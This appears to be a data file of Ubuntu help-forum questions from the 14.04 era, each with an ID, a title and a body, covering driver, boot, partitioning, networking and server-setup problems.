452457	changing font size in applications	i am using ubuntu 14.04 on a macbook pro 11-1 . because of the retina display , the resolution absolutely needs to be 2560x1600 ( i have a 13 inch ) . however , that obviously does n't work too well with an os that 's not designed for this specific need in mind . i have changed around a lot of things , but especially with apps such as spotify with developers that do not add an option to change fonts , i still get teeny tiny font everywhere that really bugs me . is there any way that i can edit these things ?
452461	rhythmbox crashes after trying to sync with ipod	i just recently upgraded my system from 13.10 to 14.04 and my rhythmbox crashes any time i simply try to view the songs carried by the ipod . i have never had this problem before , any suggestions ?
452462	ubuntu boot trouble	when i was using the universal usb installer i accidentally selected the partition i created for ubuntu to be installed on . now when i boot my pc i can no longer boot windows , and even after installing ubuntu on the drive it shows the same menu - try before installing or install now . thanks
452467	sandisk secureaccess software	sandisk usb flash drives come with a password and file encryption software called secureaccess v1.0 and the update is v2.0 . this does n't work on my ubuntu studio 12.04 lts os . their website states its only supported in wndws and mac . the error says 'please run secureaccess from an external sandisk device ' . i 'm ok with it not working for now since i have n't stored files in the protected 'vault ' folder yet , however it would be nice to use such . wine is having problems running this software . any suggestions ?
452468	how to integrate pidgin with ubuntu `` online accounts '' ( 14.04 )	the title says it all . how can i integrate pidgin with the default `` online accounts '' that comes with ubuntu 14.04 , just like empathy does . pidgin already shows up in the `` envelop '' icon in the menu bar , but i still need to configure my accounts in pidgin , i want to use the ones that i already configured in `` online accounts '' .
452469	restart does not work	i click on restart on the top menu , but the system only shut down . i have to manually to push power button to restart the machine . is it normal behaviour for ubuntu or i need to check my configuration ? your help and information is great appreciated , regards , inung
452470	i can not fix the `` the system is running in low-graphics mode '' error	i 'm running 32bit version of ubuntu 12.04 and have all necessary hardware requirements . my display device is 'via/s3g km400 ' from via/s3 graphics , inc . can not find related solution on here . can anyone help ?
452472	is my sound card dead ? ubuntu/xubuntu no audio	i was wondering if anyone knew how i can check to see if my sound card is no longer functional or if i 'm missing some libraries or something . the sound was working fine for a while and then it just died all of a sudden ... rebooting my system does n't help . is there output from any command that you 'd like to see that might help with answering my question ? please help .
452474	ca n't run dropbox due to `` authentication is needed to run '/usr/bin/dropbox ' as the super user '' error	when i upgraded from 12 to 13 there were no problems . going to 14.04 got the same message : nautilus restart required dropbox requires nautilus to be restarted to function properly . ( with a button to restart nautilus ) when i clicked on the button this time there was no response . i am able to start it using the command from the dropbox document : ~/.dropbox-dist/dropboxd and everything seems good as far as syncing up the files in dropbox . i can leave the terminal up while this is going but it should being doing this on it 's own . i do get the message on boot up that : authentication is needed to run '/usr/bin/dropbox ' as the super user i put in my password and nothing appears to happen . it appears that i should be doing something more . can anyone help me out with this ?
452475	how can i install the mysql client ?	i installed mysql server and want to install the mysql client using following code : apt-get install mysql-client but i got following error message : e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? it looks like the file locked and permission , if it is the case , it does not ask me for a password . your help and information is great appreciated . regards , inung
452479	running android emulator through qemu on lubuntu	i am trying to use an android emulator on my computer through qemu . my computer is a powerbook g4 running lubuntu . i downloaded and installed qemu and the qemu launcher . i also downloaded a .iso for android android-x86-4.0.iso when i try to launch the .iso through qemu launcher nothing happens . does anyone know how to run the emulator and be able open it and use it later ? sorry i am new to linux and terminal .
452487	access mysql and php after installation	after i installed apache2 , mysql , mysql client , phpmyadmin and php on my ubuntu 13.10 , i tested the apache2 using 127.0.0.1 and it works . i would like to learn how i can access mysql and create php scripts for my testing website and upload to a web server . your help and information is greatly appreciated .
452488	the command could not be located because '/usr/bin ' is not included in the path environment variable	can someone tell me why i get this error when i try to add a repository and what if anything i can do about it ? when i try to add a repository using : sudo add-apt-repository ppa : upubuntu-com/tor i get the following error : command 'sudo ' is available in '/usr/bin/sudo' the command could not be located because '/usr/bin ' is not included in the path environment variable . sudo : command not found
452489	flash player not working in 14.04 lts	clean install of 14.04 lts . single os . have installed chrome for linux , updated , removed , reinstalled 14.04 lts . no flash . i have done everything from every site i can find , nothing . using chrome i get a black screen . ( hardware acceleration is off ) same with chromium ... .. firefox attempts to update flash player , then says i need to update my browser and flash to the newest version . ( both are up to date ) . been 4 days and i am at my wits end ... ... any help would be appreciated .
452490	shell script to function on subfolders	i want to write a simple shell script that will go into all the sub-folders in a directory , and organise the files in the sub-folders into new directories . basically in terminal it would look like : cd ../subfolder1 mkdir newfolder mv *.txt newfolder cd ../subfolder2 mkdir newfolder mv *.txt newfolder etc . however , the cd command does n't seem to work for the shell script . anyone know how i could do this ? thanks a million !
452491	origin of environment variables in scripts under /etc/network/if-*.d	i 'd like to pass some configuration options to the script /etc/network/if-pre-up.d/ethtool , which looks like this on my system : # ! /bin/sh ethtool=/sbin/ethtool test -x $ ethtool || exit 0 [ `` $ iface '' ! = `` lo '' ] || exit 0 # gather together the mixed bag of settings applied with -s/ -- change settings= '' \ $ { if_ethernet_port : + port $ if_ethernet_port } \ $ { if_driver_message_level : + msglvl $ if_driver_message_level } \ '' [ -z `` $ settings '' ] || $ ethtool -- change `` $ iface '' $ settings but i 'm wondering what process supplies its environment variables , such as $ if_ethernet_port ; and where that process is configured so i can specify my own variables . i 've looked at files such as : /etc/init/network-interface-container.conf /etc/init/network-interface-security.conf /etc/init/networking.conf /etc/init/network-interface.conf /etc/init.d/networking /etc/defaults/networking and tried adding the variables here and there , but nothing seems to work ( i can tell because i modified the ethtool script shown above to write $ settings to a file in my home directory ; and it 's always blank ) . if i understand correctly , the package whose configuration i 'm looking for is ifupdown . i 'm a little confused about it because from reading those files i concluded that it does n't use upstart , but the actual presence of /etc/init/âś files in the package seems to suggest otherwise . so , how do environment variables get passed to /etc/network/if-pre-up.d/ethtool ?
452493	how do i set up my dual monitors ? my config folder does not have monitors.xml in ubuntu 12.04	i tried creating a monitors.xml in config folder using gedit and just saved it there . rebooted but does n't work . i am trying this link . http : //www.sudo-juice.com/dual-monitor-settings-in-ubuntu/ but this requires that you should have monitors.xml but i do n't have that file on config .
452494	how do i disable loading a driver for a specific device	i am running ubuntu 13.10 , attempting to setup pci pass-through for my discrete graphics card to a windows 7 guest vm running on kvm . my processor is an amd apu with iommu support , my discrete graphics card is an amd radeon hd6950 . pass-through works when i blacklist the radeon driver , but since my apu also uses the radeon driver ubuntu then has to render graphics using the cpu . i tried unbinding the radeon driver before x has loaded , but this causes a bsod when i start the guest , i 'm guessing because the linux radeon driver sets up the card and the windows driver is expecting a freshly powered on graphics card . i tried adding a udev rule to ignore the device when it gets added , but the driver is still loaded for the discrete graphics card . kernel== '' 0000:01:00.0 '' , options= '' ignore_device '' how can i prevent ubuntu from loading the radeon driver for my discrete graphics card and not for my apu ?
452497	14.04 vnc xstartup file	i updated to 14.04 to do some testing , and now vnc is hosed . i installed gnome-classic to see if that helped but it did not . here is my xstartup : ! /bin/sh uncomment the following two lines for normal desktop : unset session_manager exec /etc/x11/xinit/xinitrc gnome-session -- session=gnome-classic & [ -x /etc/vnc/xstartup ] & & exec /etc/vnc/xstartup [ -r $ home/.xresources ] & & xrdb $ home/.xresources xsetroot -solid grey vncconfig -iconic & x-terminal-emulator -geometry 80x24+10+10 -ls -title `` $ vncdesktop desktop '' & x-window-manager & gnome-session -session=gnome-classic & i have been reading everything i can find on the interwebs for hours . does anyone have an xstartup that works with 14.01 ?
452498	program launches only as root but not normally	i installed matlab in the home directory . now when i try to launch it normally from the bin folder , it starts up and then gives an error that says : internal error : no write permission on directory /home/uname/.matlab/rxxxxx/temp014c0x3 ... but it launches when i run it using sudo . so , i 'm not sure what exactly is happening . this basically prevents me from using a launcher for it , as every time this error pops up . i do n't want to run it as root . any pointers ?
452499	how to install ubuntu on a single partition	i 've been trying to get ubuntu installed over the last few days and i 'm almost there . my problem now is that i can only have one more primary partition because i already have three others . i have 28gb of unallocated space and have tried going into the ubuntu installer and under the `` something else '' option creating an ext4 primary partition with mount as `` / '' . however , once i do that the rest of the free space i set aside for swap turns into `` unusable '' and from then on i ca n't create a swap partition . so how can i get a partition for `` / '' and a swap area on one primary partition ?
452502	error when starting ubuntu laptop .	my laptop is a modified toshiba satellite l355 . it has a intel core 2 duo 1.83ghz cpu and 3gb ddr2 ram . i 'm using saucy salamander 13.10 i installed ubuntu studio a while back when my friend gave it to me . did n't have any problems for about a month or so , until recently . whenever i go to boot her up , she will start the boot process with no issues , and even get so far as to pull up the loading screen right before the login screen . a mouse cursor will even appear for a few seconds . however , as soon as it reaches this point , it drops to a black screen , and then keeps repeating a message over and over again - [ 55.855233 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed [ 55.855278 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through the numbers in the brackets at the beginning of the line vary each time the message occurs . also if note , is that before the loading screen before the login screen , another message pops up very shortly : [ drm : intel_pipe_config_compare ] error mismatch in gmch_pfit.lvds_border_bits ( expected 32768 , found 0 ) then it vanishes and resumes the boot process before dropping to the endless asking for cache data failed messages . i did some research on the issue - most people have come to the conclusion that it is a issue with the sd card reader , specifically that the kernel keeps asking for a cache for it . some people have had success with inserting and removing sd cards and the little plastic place holders that often come with them . when i try inserting an sd card , the cache data failed messages stop , after a reboot , but it instead just drops to the same black prompt , just without the messages . one time when i removed the card and re inserted it as it was running , the message changed to : [ 33.640843 ] sd 6:0:0:0 : [ sdb ] no caching mode page found [ 33.640903 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through a few solutions were offered , all of which were tried in recovery mode root prompt . however , none of them have worked , even the sudo rmmod ums_realtek command i have even gone so far as to disassemble my laptop , only to find out that the sd card reader is integrated into the motherboard , and thus can not be removed . another thing to note is that most of the other pages i have looked at with people describing similar problems , their computers still ran , they simply received these messages as the machine ran . i 'm fairly new to linux , so there may be some obvious fix i 've overlooked , but i 've tried to do research and fix this issue on my own . i just ca n't seem to get her to boot normally and get past that unending cache data failed message . please help
452503	battery stuck at whatever number comes on booting	my laptop battery is stuck at whatever number it has while booting . now it shows 62 % battery remaining with 2:10 hours to go . last time it was 3:11 hours to charge . anyway i can fix this ? i 'm running ubuntu 14.04 on my dell inspiron 15r .
452507	mistakingly erased hard drive	i had a dual-booting ubuntu 14.04 with windows 8 . i did not like ubuntu 14.04 ( most of the packages did not work ) so i wanted to reinstall it . i booted the installation for ubuntu 13.10 . when it asked me how i wanted to install , it said : `` setup detected ubuntu 14.04 on this machine ! '' it then gave me 3 options : install alongside ubuntu 14.04 erase ubuntu 14.04 and install ubuntu 13.10 do something else i picked option 2 . ( erase ubuntu 14.04 and install ubuntu 13.10 ) assuming it would only erase ubuntu 14.04 ( oops ! ) . it ended up formatting the entire hard disk . i had many important files on the ntfs windows partition . is there any ways i can recover the files from the now-erased ntfs partition ? oops , this is a duplicate of this post .
452509	`` invalid arch-indepent elf magic '' when starting 14.04 from grub menu	i posted this question earlier in the day . after toying around for a little while , i figured out that my windows 7 repair disc could n't detect my hdd . i ran boot repair and restored the mbr . windows 7 would boot , but ubuntu would return invalid arch-independent elf magic . after receiving that error , my computer would only boot to a non-gui grub menu . i 'm really not sure whether it 's possible to restore my setup . specs : system : alienware m14x r2 secondary memory : 750 gb hdd , 32 ssd for caching using irst with windows operating systems : windows 7 ultimate sp1 , trusty tahr partitioning scheme : 100 mb system reserved ntfs for windows , ~200 gb ntfs for windows , ~350 gb ntfs storage partition , 50 gb ext4 ubuntu partition , 32 gb swap
452515	lag on apt-get operations after upgrade to trusty ( 14.04 )	after upgrading my server from saucy ( 13.10 ) to trusty ( 14.04 ) , there is now a weird lag on all apt-get operations . it 's slower in general ( just the apt-get , not the system ) but also at the beginning , right after the command is issued , it just sits there . say i run # apt-get update 20 seconds pause ( literally ) , nothing happening , then the usual ign http : //ppa.launchpad.net trusty inrelease ign http : //ppa.launchpad.net trusty inrelease ign http : //fr.archive.ubuntu.com trusty inrelease ign http : //ppa.launchpad.net trusty inrelease ign http : //fr.archive.ubuntu.com trusty-updates inrelease ign http : //ppa.launchpad.net trusty inrelease ign http : //ppa.launchpad.net trusty inrelease ign http : //fr.archive.ubuntu.com trusty-backports inrelease hit http : //ppa.launchpad.net trusty release.gpg hit http : //ppa.launchpad.net trusty release.gpg hit http : //fr.archive.ubuntu.com trusty release.gpg hit http : //ppa.launchpad.net trusty release.gpg ign http : //ppa.launchpad.net trusty release.gpg hit http : //fr.archive.ubuntu.com trusty-updates release.gpg and so on . similar thing happens on other apt-get commands , like # apt-get autoremove this time 5 seconds pause . reading package lists ... done building dependency tree reading state information ... done 0 to upgrade , 0 to newly install , 0 to remove and 0 not to upgrade . or # apt-get dist-upgrade again , five seconds pause . reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 to upgrade , 0 to newly install , 0 to remove and 0 not to upgrade . it does n't seem like much but it 's very annoying . what 's the hold up ? or how can i find out ?
452517	how do i change a keyboard key to operate as the spacebar ?	my spacebar key on my laptop no longer works . i may ultimately get it repaired . in the meantime i use the onscreen keyboaed , when possible , but i would like to designate a different key to function as the spacebar key .
452524	how to download all files from ubuntu one ?	i just installed ubuntu 14.04 , and ubuntu one is n't installed by default and their download page says it comes pre installed , which does n't help with anything . i wan na move all my files from ubuntu one to dropbox , but downloading one file at a time from the browser and upload it again to dropbox will take way too long . is there any way to get ubuntu one on ubuntu 14.04 ? or somehow download all files from the ubuntu one website ? i see they updated their site :
452527	what 's the difference of the first point-release with the initial stable-release of an lts ?	so ubuntu-14.04 trusty-tahr is out and it looks awesome ! i use lts editions on my main work machine ( laptop ) and currently i 'm on ubuntu-12.04 but i 'm very eager to perform a fresh install of trusty . that said , what 's the difference between the initial stable-release ( currently available ) and the first point-release ( 14.04.1 due to july ) ? are there any major changes ? what are the benefits of waiting an extra 3-months for 14.04.1 ? or should i just start the installation right now ? !
452529	how do i troubleshoot unstable internet following 14.04 update ?	i recently updated to ubuntu 14.04 and since then , i 've been having internet difficulty . the internet works without issues on windows 8 on the same system . my computer sometimes has issues establishing a connecting and after the little connection animation runs for about 20 seconds , i see a balloon saying `` disconnected - you are not connected to the internet . '' once i do get connected , the internet is excessively slow . i 've been using the ping command to check the status of the internet . when i ping 8.8.8.8 ( google 's dns server ) , the response times are rarely below 100 ms as they should and sometimes reach the 50,000s ( of ms ) . sometimes , my computer says it 's connected to the internet but i am unable to load or ping anything . my computer also frequently disconnects . it also asks for my wifi password while connecting sometimes which is strange because the connection details are saved on my computer . does anybody have any ideas on how i could go about fixing this or at least diagnosing the problem ? i can post the outputs of any terminal commands if the information will help . thanks in advance here are is the output to iwconfig : lo no wireless extensions . wlan0 ieee 802.11abgn essid : < my router name here > mode : managed frequency:2.412 ghz access point : 28 : c6:8e:23 : b5 : c2 bit rate=300 mb/s tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off power management : on link quality=49/70 signal level=-61 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:260 missed beacon:0
452530	gedit error message 8828	i wanted to edit my php.ini file , so i type sudo gedit php.ini but i got following error message : inung ** ( gedit:8828 ) : warning ** : could not load gedit repository : typelib file for namespace 'gtksource ' , version '3.0 ' not found ( gedit:8828 ) : ibus-warning ** : the owner of /home/myuser/.config/ibus/bus is not root ! it looks like missing gtksource for this . any suggestions to fix the issue ?
452532	unable to open /etc/ati/control , please reinstall the driver 14.04	please reopen this question , as 14.04 is now official and no longer a beta version , and the problem still exists : unable to open /etc/ati/control , please reinstall the driver
452534	completely messed up grub/efi/gpt dual boot	i seem to have almost entirely screwed up my machine . i was attempting to install an ubuntu liveusb to my external hdd , but in the process i messed up my internal setup . the external one works ; ) it 's a dual boot system , and it originally came with win8 plus a whole bunch of lenovo/windows recovery partitions . it has a 24gb ssd hybrid as well . i had secureboot disabled before , and installed ubuntu 13.04 , and recently upgraded to 14.04 . it was working fine until my little misadventure . all of my boot flags seem to be constantly changing now , too . i 'm not entirely sure why . output from boot-repair ( which would n't allow me to choose /dev/sda2 or /dev/sda11 , only sda8 ( which is my home partition ? ) . i tried it anyway . it said it succeeded , but did n't do anything obviously . http : //paste.ubuntu.com/7303953/ my ( many ) partitions are as follows : /dev/sda1 -- winre_drv ( 1000mb ntfs , flags : hidden , diag ) /dev/sda2 -- this was my original efi partition i think ( was originally labelled as system_drv and was formatted as fat32 , but now it 's an unrecognized filesystem ) . /dev/sda3 -- unknown , msftres ? ? /dev/sda4 -- windows8 os ( 68gb ntfs , flags : msftdata ) /dev/sda11 -- i created this as fat32 with the 'boot ' flag , in the hopes of creating another efi partition and moving it over , but it does n't seem to be recognized by boot-repair . /dev/sda5 ( 350mb , ntfs flags : hidden , diag ) -- no idea what this is . /dev/sda6 ( 20gb ext4 , flags : hidden ? ) -- my system partition for ubuntu . not sure why it now has a 'hidden ' flag . /dev/sda7 -- 4gb swap /dev/sda8 -- my home partition for ubuntu ( 75gb ext3 , flags : msftdata ) /dev/sda10 -- 290gb ntfs shared data partition ( flags : msftdata ) /dev/sda9 -- lenovo recovery ( 10gb ntfs , flags : hidden , diag ) something is seriously screwed up here . i 'd really rather prefer to not reformat . i 've read most of the articles regarding uefi and gpt , etc , but i ca n't seem to fix my problem , and actually just seem to be making it worse . it 's also possible that the livecd grub is n't using the right files ? it tries to install with i386-pc , when i thought i should be using something like x86_64-efi-signed or something . could someone please help walk me through this ? edit : ok , so i downloaded and installed refind to windows and made a bootable usb with that , which allowed me to boot into my actual linux os and not a livecd . from there i was able to use boot-repair properly to install grub ( to /dev/sda11 ) and to boot /dev/sda6 . the problem with boot-repair before was that it did n't detect my efi partition so it was trying to install non-efi to my /dev/sda6 ( likely because i was doing it from a livecd ) . it seems to be an issue with the grub which comes with ubuntu14.04 though , that it does n't have efi support or something ? anyway , now i have efi on /dev/sda11 , but i have two unknown partitions ( sda2 and sda3 ) . what was sda3 in the first place ? and what can i do with sda2 and the files on it ( like for lenovo recovery stuff ) ? can i just delete those partitions , or will that cause more issues ? finally , is it just a matter of running windows recovery now ? i imagine that will break my ubuntu and grub again . thanks !
452537	ubuntu wo n't login after installing nvidia drivers	yesterday i installed ubuntu 14.04 without any problems . i want to use my nvidia drivers instead of the integrated intel graphics so i tried to use the driver checker provided by ubuntu , the problem with this is that ubuntu gets internal errors . the next problem is that when i install nvidia drivers by using the sudo apt-get install nvidia-current ubuntu wo n't login to the computer . note that i can start the computer and i get to the login screen but after entering the password the only thing that happens is that i can see my background image just like the desktop is loading . by using ctrl+ alt + f1 i removed the nvidia drivers and the ubuntu worked again . how can i get the nvidia drivers to work ? and what could i do about the internal error message ? specs : asus k53s intel core i5 ( 2.6 ghz ) nvidia gt 630m 2gb 4gb ram
452539	how do i make a ubuntu vm that boots to terminal but has gui capabilities ?	i have to make an ubuntu vm ( virtualbox ) to run python scripts ( on windows hosts ) utilising guis like pygame , tkinter and pythonwx ( especially tkinter for my legacy apps ) making a vm appliance with a full desktop environment takes ~3.5 gb i 've found . i have to reduce this for distribution ease . i removed all desktop managers and desktop files , which crashed my appliance ( nothing to boot into ) . then i set grub to boot to text console only , but now i have no gui services or window managers available , of course . plan a : i want to find something i can load at boottime for gui capability , preferably a background service . what could do the job ? plan b : alternatively , i could install a barebones dm and desktop system and set that to load a terminal after loading . recommendations ?
452540	how to download the iso file of ubuntu in command line ?	i need to install the virtualbox in the company 's server by the client , putty . then install the ubuntu 14.04 in the virtualbox . right now i have find the methods of installing the virtualbox in the server . however , i can not download the iso file in the way of command line .
452547	ubuntu14.04 `` fails to start session ''	yesterday i upgraded from ubuntu 12.04 lts to 14.04 using the update manager . everything went smoothly . but when i restarted my laptop , it went till the login screen and as i entered my password , it prompted an error failed to start session i read in some blogs and even tried to use sudo dpkg-reconfigure -a , but even that failed with some errors . i feel it does not connect to the internet through my router when i use the recovery mode . can someone please help me . i have lot of data in there and do n't want to install a fresh copy of ubuntu 14.04 . i am using a dell studio 1555 laptop with ati mobility radeon 4500 hd graphic card . i ran the following command $ sudo dpkg -- configure -a output : dpkg : error : unable to access dpkg status area : read-only file system
452551	can not mount partition with cryptsetup	i have a spare drive . i 've attempted to format it and encrypt it . but even though the process appears to succeed and i can open the crypt , i can not mount the newly mapped device . here is the output of my commands : # fdisk /dev/sdb command ( m for help ) : p disk /dev/sdb : 1500.3 gb , 1500301910016 bytes 16 heads , 63 sectors/track , 2907021 cylinders , total 2930277168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x60e924ef device boot start end blocks id system /dev/sdb1 2048 2930277167 1465137560 83 linux command ( m for help ) : d selected partition 1 command ( m for help ) : n partition type : p primary ( 0 primary , 0 extended , 4 free ) e extended select ( default p ) : p partition number ( 1-4 , default 1 ) : using default value 1 first sector ( 2048-2930277167 , default 2048 ) : using default value 2048 last sector , +sectors or +size { k , m , g } ( 2048-2930277167 , default 2930277167 ) : using default value 2930277167 command ( m for help ) : w the partition table has been altered ! calling ioctl ( ) to re-read partition table . syncing disks . # mkfs.ext4 /dev/sdb1 mke2fs 1.42.9 ( 4-feb-2014 ) filesystem label= os type : linux block size=4096 ( log=2 ) fragment size=4096 ( log=2 ) stride=0 blocks , stripe width=0 blocks 91578368 inodes , 366284390 blocks 18314219 blocks ( 5.00 % ) reserved for the super user first data block=0 maximum filesystem blocks=4294967296 11179 block groups 32768 blocks per group , 32768 fragments per group 8192 inodes per group superblock backups stored on blocks : 32768 , 98304 , 163840 , 229376 , 294912 , 819200 , 884736 , 1605632 , 2654208 , 4096000 , 7962624 , 11239424 , 20480000 , 23887872 , 71663616 , 78675968 , 102400000 , 214990848 allocating group tables : done writing inode tables : done creating journal ( 32768 blocks ) : done writing superblocks and filesystem accounting information : done # cryptsetup -v luksformat /dev/sdb1 warning ! ======== this will overwrite data on /dev/sdb1 irrevocably . are you sure ? ( type uppercase yes ) : yes enter passphrase : verify passphrase : command successful . # cryptsetup luksopen /dev/sdb1 mycrypt enter passphrase for /dev/sdb1 : # ls -l /dev/mapper/mycrypt lrwxrwxrwx 1 root root 7 apr 21 20:41 /dev/mapper/mycrypt - > ../dm-0 # mount -t ext4 /dev/mapper/mycrypt /mount/mycrypt/ mount : wrong fs type , bad option , bad superblock on /dev/mapper/mycrypt , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so
452552	unable to connect to ethernet in ubuntu 14.04	i have hp pavilion g6-2201ax laptop . i was working with live usb . but ubuntu detects ethernet connection but before establishing connection it gets disconnected . i have realtek rtl8168 pcie controller . this is the info i got over the internet : integrated 10/100 base-t ethernet lan . hardware id ethernet controller pci\ven_10ec & dev_8136 & subsys_184aec103c & rev_05 pci\ven_10ec & dev_8136 & subsys_184aec103c pci\ven_10ec & dev_8136 & cc_020000 pci\ven_10ec & dev_8136 & cc_0200
452556	how to set up nvidia optimus/bumblebee in 14.04	the previous methods i have used to set up bumblebee on 13.10 based distributions is not working under ubuntu 14.04 . how can i set up bumblebee and bumblebee gui in ubuntu 14.04 ?
452558	unity does n't load on boot , even after re-installing after mistakingly deleted	an install of ubuntu 13.10 was messed up due to compiz ; so i did a fresh install of ubuntu 14.04 on it . after my 2nd session , unity wo n't startup when i boot ( the log-in screen works , but i 've noticed is at a very low resolution ) ; i.e. , no launcher , no dash , no anything . unity does n't load , no launcher , no dash appears addresses the issue ; but i 'm trying to find the root cause here , i do n't think i should have to patch a fresh install just to get it working . similar questions are about the upgrading process breaking something , which does n't apply here . i did not edit any compiz or other display settings like my driver . the only things i can think of that might be responsible for this is enabling the canonical partners repo to install flash , and leaving a tv always connected via hdmi set to mirror my laptop screen . [ edit : ] i just realized that unity was n't installed ! installing unity-scope-grooveshark had disabled it , and i had n't read the fine print too clearly before saying yes . but even after installing unity does n't start up . what now ? [ update : ] i 've since reinstalled my system , but i 'm going to leave this question open in case an answer useful for others might spring up . i also drastically changed the title of the question to better reflect the new info .
452561	graphic driver not working for games ( 12.04 )	this is my first post so please excuse the noobiness of this . not really sure how to describe the problem so bear with me on this . i have been experimenting with graphics drivers recently in order to help my gaming performance . but , after using tutorials on installing some and rebooting , my system settings does n't show a graphics driver anymore and games do not work whatsoever . i can still watch videos and movies but games will not work at all . all i really want is to be able to get my default driver back and rid myself of everything i did to mess this up . the reason i am starting a new question is because no solutions i sought after brought me any closer to fixing my issue . i am running ubuntu 12.04 , my card is an msi twin frozr ii and my lspci | grep vga output is 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rs880 [ radeon hd 4250 ] i removed the ppa 's i had installed , and also uninstalled nvidia-current , yet my issue still persists . not sure what other information is needed to help but i will provide all i can .
452564	unable to dual boot windows and ubuntu	i bought a laptop few months ago which came ubuntu preinstalled . i installed windows on it and tried to recover grub using boot repair disk , but still no luck , i am not even gettin g option to choose ubuntu . any help ? a log has been generated while reparing boot manager which is here : http : //paste.ubuntu.com/7299301/ thanks
452570	weird behavior of apache2 on ubuntu with php.ini file	i am trying to solve ultimate problem of why session variables are not saved when i run my php script . after researching for a while i went on to check session.cookie_lifetime value which is set to 0 so session data should have preserved . after that i checked my php configuration by running info.php file . this is what it says for loaded configuration value for php.ini file : /etc/php5/apache2 however , i do n't have php.ini file at this location . all i have at this location is conf.d directory which contains three other ini file except php.ini . i do n't know why and how it happened . in fact , i have php.ini at location /etc/apache2 so php.ini file does not seem to taking effect . could you please suggest what needs to be done to bring correct php.ini file ? should i move php.ini file from /etc/apache2 to /etc/php5/apache2 ? if php.ini file at all not there then why info.php says loaded configuration file from /etc/php5/apache2 any help is appreciated .
452571	can not select installation drive	i use windows xp and currently have 3 partitions c : ( 40gb max ) . d : ( 90gb max ) . e : ( 10gb max ) . all use ntfs file system . i want to install ubuntu just as a secondary os using wubi . the problem i am facing now is , c drive is fully reserved for windows . d drive is filled with 80gb of important documents . e drive has 9gb freespace . wubi installer allows me only to select either c drive or d drive , while i want it to install only on e drive the e drive option is not present even if i set the installation size as 5gb
452578	unable to install anything higher than ubuntu 13.04 on my triple monitor setup	i have 3 1680 x 1050 displays which i run in eyefinity for dual gpu 7970s . now in windows this works fine , but in ubuntu distros greater than 13.04 my dm is borked . i can get in to my desktop environment by typing in the password blindly ; however when i get into the de only unity displays properly . when i expand the workspaces to workspace selector , each one is stretched way out , so i think that had something to do with it . has anyone had this problem ? i ca n't see anything that i 'm doing on the de , it looks like 8 bit digital barf . is there anything i can do aside from starting with only 1 monitor to make this work ? i want to keep my windows install intact for a dual boot system .
452580	problem with dual graphics and battery backup	i have samsung np355v5c-s05in laptop . it has 2 graphics card one amd radeon hd 7640g , 512mb motherboard integrated and one hd 7670 , 1 gigs dedicated . while using the ubuntu graphics software it shows the dedicated 7670 one but when i installed the propriority driver it only shows 7640 one . also the ubuntu drivers tend to be harsh on battery back meaning it reduces the battery backup of laptop . so i wanted to ask that is there any way so that both my graphics are utilised as well as the battery back is also increased . i used tlp but it interfered with the graphics and display was gone so i had to purge it . so 1 . want to use both my graphics . 2 . want to increase battery backup as currently in ubuntu it is around 2 to 2and half while im windows 8 it gave around 4 hours of backup on ordinary usages .
452581	how to install ubuntu server 14.04 without internet connection ?	ubuntu server 14.04 installation fails without internet connection . also , tried the minimal installation using f4 function key in the starting by choosing minimal install . in this case also , it is asking for internet connection .
452585	ubuntu 14.04 keyboard performance vbox/mac	i have installed 14.04 as a virtual box vm on my mac . i am not expecting super performance . but it is not bad , except for the key stroke delay . any suggestions ? thanks !
452586	ubuntu cloud image with lamp installed	is there any ubuntu cloud image with lamp installed in it ? i have openstack installed and wanto create an instance and run a simple 2 or 3 pages website .
452589	how to know ubuntu source code version ?	i downloaded the source code using the following command : git clone git : //kernel.ubuntu.com/ubuntu/ubuntu-precise.git this gives me a folder named : ubuntu-precise . but what is its version ? how do i know this ? by the way my running kernel is : # lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise also : 3.8.0-38-generic # 56~precise1-ubuntu smp thu mar 13 16:23:47 utc 2014 i686 i686 i386 gnu/linux changelog is located at many places ./arch/arm/lib/changebit.s ./debian.master/changelog.historical ./debian.master/changelog ./drivers/staging/rtl8192u/changes ./ubuntu/omnibook/debian/changelog so i checked in debian.master/changelog these are the first few lines : linux ( 3.2.0-61.92 ) precise ; urgency=low [ kamal mostafa ] * release tracking bug - lp : # 1300455 [ upstream kernel changes ]
452595	can not add ppa behind proxy ubuntu 14.04	i am unable to add a repository via the command line on ubuntu 14.04 . apt-get works perfectly fine , and i am able to update the system . i have configured my /etc/apt/apt.config file as follows : acquire : :http : :proxy `` http : // < username > : < password > @ < proxy address > : < port > / '' ; for example , when trying to add the repository for y-ppa-manager , i receive : add-apt-repository ppa : webupd8team/y-ppa-manager can not add ppa : 'ppa : webupd8team/y-ppa-manager ' . please check that the ppa name or format is correct . if you need any more info. , feel free to ask .
452602	intel gma 4500mhd driver problem	i have an acer 5736z-4427 laptop with an intel gma 4500mhd . i first installed ubuntu 10.10 ( 32-bit ) . i had no graphics problems at all . when 10.10 went by the way side i upgraded to 12.04lts . i got the black screen of death . i used the f6 nomodeset trick to force the load . i can now boot without black-screen but `` display '' in gnome system setting shows a screen resolution of 1024x768 ( 4:3 ) . when i pull down on resolution only 1024x768 ( 4:3 ) and 800x600 ( 4:3 ) are available . my actual resolution is 1366x768 ( 16:9 ) . all screens are spread out horizontally . i have the same problem in 12.04 , 13.10 , and 14.04 . what happened to the graphics driver that worked ok in 10.10 ( and in 10.04 ) ?
